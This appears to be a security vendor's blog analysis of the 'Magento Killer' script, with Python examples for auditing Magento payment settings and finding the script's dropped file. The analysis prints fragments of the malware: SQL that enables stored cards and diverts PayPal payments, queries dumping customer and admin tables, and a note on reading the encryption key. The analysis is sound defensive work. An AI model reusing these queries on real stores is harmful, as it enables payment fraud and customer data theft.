
Magento Killer: A new ecommerce security threat

Magento Killer is the latest ecommerce security threat. It allows the attacker to modify rows in the core_config_data table of the Magento database, and the goal of the attack is to steal users' payment data.

First, the script carries a set of base64-encoded SQL queries; the decoded form of each is shown in the comments below:

$ConfKiller = array( 
         'Update DB (Savecc)' =>
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
         'Update PP (MailPP)' =>
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';

With the two objects from the array, the attacker wants to:

  • Update DB (Savecc): Configures the Magento site to store customers' credit card details on the server instead of forwarding them, as it normally would, to a payment processor (e.g. Authorize.Net).
  • Update PP (MailPP): Changes the PayPal merchant business account associated with the Magento site to whatever account the attacker chooses, so PayPal payments are diverted.
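The two configuration changes above are easy to check for from the defender's side. The following added example (written for this article, not part of the Magento Killer script or of Magento itself) builds an in-memory SQLite table with the same column layout as core_config_data, fills it with constructed sample rows, and runs an audit that flags the two indicators described above: payment/ccsave/active set to 1, and a paypal/general/business_account value that differs from the merchant's known-good address. The known-good address and the sample rows are assumptions; on a real store the same two SELECT statements would be run against the live MySQL database.

```python
import sqlite3

# Constructed sample rows in the shape of Magento's core_config_data table.
# The first two rows reproduce the state left behind by the "Savecc" and
# "MailPP" updates; the third is an unrelated, benign setting.
SAMPLE_ROWS = [
    ("default", 0, "payment/ccsave/active", "1"),
    ("default", 0, "paypal/general/business_account", "attacker-account@example.net"),
    ("default", 0, "web/unsecure/base_url", "http://shop.example/"),
]

# Assumption: the address the merchant actually uses for PayPal.
EXPECTED_PAYPAL_ACCOUNT = "payments@shop.example"


def build_sample_db(rows=SAMPLE_ROWS):
    """Create an in-memory table mirroring core_config_data and load rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE core_config_data ("
        "config_id INTEGER PRIMARY KEY, scope TEXT, scope_id INTEGER, "
        "path TEXT, value TEXT)"
    )
    conn.executemany(
        "INSERT INTO core_config_data (scope, scope_id, path, value) "
        "VALUES (?, ?, ?, ?)",
        rows,
    )
    conn.commit()
    return conn


def audit_payment_config(conn, expected_paypal_account=EXPECTED_PAYPAL_ACCOUNT):
    """Return a list of (path, scope, scope_id, value, reason) findings."""
    findings = []

    # Indicator 1: saved-card payment method enabled. Magento stores the
    # on/off flag as the string "1" / "0".
    for scope, scope_id, value in conn.execute(
        "SELECT scope, scope_id, value FROM core_config_data "
        "WHERE path = 'payment/ccsave/active'"
    ):
        if value == "1":
            findings.append(("payment/ccsave/active", scope, scope_id, value,
                             "card details are being stored on the server"))

    # Indicator 2: PayPal business account differs from the expected one.
    for scope, scope_id, value in conn.execute(
        "SELECT scope, scope_id, value FROM core_config_data "
        "WHERE path = 'paypal/general/business_account'"
    ):
        if value != expected_paypal_account:
            findings.append(("paypal/general/business_account", scope, scope_id,
                             value, "PayPal merchant account was changed"))
    return findings


if __name__ == "__main__":
    db = build_sample_db()
    for path, scope, scope_id, value, reason in audit_payment_config(db):
        print(f"[!] {path} ({scope}/{scope_id}) = {value!r}: {reason}")
```

Both indicators are checked at every scope, not just `default`, because a website- or store-level row overrides the default in Magento and would be missed by a check that filters on scope.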

The stored credit card information is encrypted, but if the attacker has access to the filesystem, the encryption key can be read from ./app/etc/local.xml.

With the encryption key in hand, the attacker can decrypt the credit card information to plaintext and use it for fraudulent transactions, or simply sell the stolen data.

The hacker also needs the customer information from the database in order to use the stolen payment data. They’ll be looking for the correct name, email address, physical mailing address, and other billing information associated with the stolen credit card.

To collect the customer information, the script runs another set of SQL queries:

$query = array(
'admin_user'                        => 'SELECT * FROM admin_user' ,
'aw_blog_comment'                   => 'SELECT * FROM aw_blog_comment' ,
'core_email_queue_recipients'       => 'SELECT * FROM core_email_queue_recipients' ,
'customer_entity'                   => 'SELECT * FROM customer_entity' ,

With all the data it needs, the script writes a *-shcMail.txt file into the current directory containing the relevant customer information.

$namefile = md5(time())."-shcMail.txt";
foreach ($query as $shc_key => $shc_query) {
$hasil = mysql_query($shc_query);
    while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
        $mail[] = $kolom_db[$shcolom[$shc_key]];
        $myfile = fopen($namefile, "a+") or die("Unable to open file!");
        fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."\r\n");

When run from a browser, the script simply returns a hyperlink to the generated *-shcMail.txt file, then reports back whether the two initial configuration changes succeeded.
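The dropped output file is itself a useful indicator. The snippet above names it md5(time()) followed by "-shcMail.txt", so the file name is always 32 lowercase hex characters plus that suffix. The following added example (written for this article, not part of the malware or of Magento) walks a directory tree and reports every file matching that pattern; the sample tree it builds in a temporary directory is constructed purely to exercise the scan.

```python
import hashlib
import os
import re
import tempfile
import time

# md5(time()) in PHP yields 32 lowercase hex characters; the script appends
# a fixed suffix, so the artifact name has this exact shape.
SHCMAIL_PATTERN = re.compile(r"^[0-9a-f]{32}-shcMail\.txt$")


def find_shcmail_artifacts(root):
    """Walk `root` and return sorted (relative_path, size_in_bytes) for every
    file whose name matches the Magento Killer output pattern."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if SHCMAIL_PATTERN.match(name):
                full = os.path.join(dirpath, name)
                hits.append((os.path.relpath(full, root), os.path.getsize(full)))
    return sorted(hits)


def build_sample_tree():
    """Create a constructed Magento-like tree containing one real artifact,
    one benign file, and one near-miss name that must not match."""
    root = tempfile.mkdtemp(prefix="magento-scan-")
    os.makedirs(os.path.join(root, "app", "etc"))

    # Benign file that should be ignored.
    with open(os.path.join(root, "index.php"), "wb") as f:
        f.write(b"<?php\n")

    # Artifact named the same way the malware names it (constructed content).
    artifact = hashlib.md5(str(int(time.time())).encode()).hexdigest() + "-shcMail.txt"
    with open(os.path.join(root, "app", artifact), "wb") as f:
        f.write(b"alice@example.com\r\n")

    # Near miss: right suffix, but no 32-hex-character prefix.
    with open(os.path.join(root, "notes-shcMail.txt"), "wb") as f:
        f.write(b"not an artifact\n")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel_path, size in find_shcmail_artifacts(sample_root):
        print(f"[!] suspicious export: {rel_path} ({size} bytes)")
```

On a real store the call would be `find_shcmail_artifacts("/path/to/magento")`; a match is worth treating as a data exfiltration event, since the file's contents are the customer records the attacker selected.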

If you think your Magento installation has been compromised, we would be glad to help you.

Check our offer and you can contact us or make a pricing request.

We can help you stay safe!

We also know how important costs are.
